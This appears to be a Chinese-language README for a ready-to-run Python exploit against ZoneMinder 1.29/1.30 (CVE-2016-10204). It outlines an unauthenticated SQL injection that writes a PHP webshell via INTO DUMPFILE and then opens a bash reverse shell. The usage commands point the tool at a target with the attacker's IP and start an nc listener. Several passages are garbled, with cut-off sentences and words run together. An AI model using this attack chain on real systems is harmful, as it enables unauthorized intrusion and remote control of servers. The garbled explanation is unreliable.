
针对 ZoneMinder 1.29/1.30 的未认证 SQL 注入到 RCE 漏洞利用(CVE-2016-10204,EDB-41239)。Python 编写的单命令 SQLi 到 webshell 再到反向 shell 的 PoC。
一个可直接运行的 Python 漏洞利用工具,针对 ZoneMinder 1.29/1.30,将未认证的 SQL 注入(CVE-2016-10204,EDB-41239)一路串联到交互式反向 shell。
这是一个针对已知且已修补的 CVE 的武器化/自动化 PoC,并非新的漏洞利用。
该漏洞的 EDB PoC 止步于 SQLi 载荷,或者只是“把 sqlmap 指向它”。本漏洞利用工具将完整的 SQLi 到 webshell 再到 shell 链条打包成一个可读的脚本。
SLEEP)的探测,对 index.php?view=request&request=log&task=query 的 limit POST 参数确认注入点。SELECT ... INTO DUMPFILE 将一个小的 PHP webshell 写入 Web 根目录,尝试多个常见的 ZoneMinder/Apache 路径。bash 反向 shell。DUMPFILE,而非 。 会转义换行符并破坏多行 PHP; 写入原始字节,因此 webshell 保持有效。OUTFILEOUTFILEDUMPFILE# 弹出 shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443
# 在提示时,在另一个终端启动你的监听器
sudo nc -lvnp 443
# 之后,删除它投放的 webshell(名称会在最后打印出来)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php
MIT,参见 LICENSE。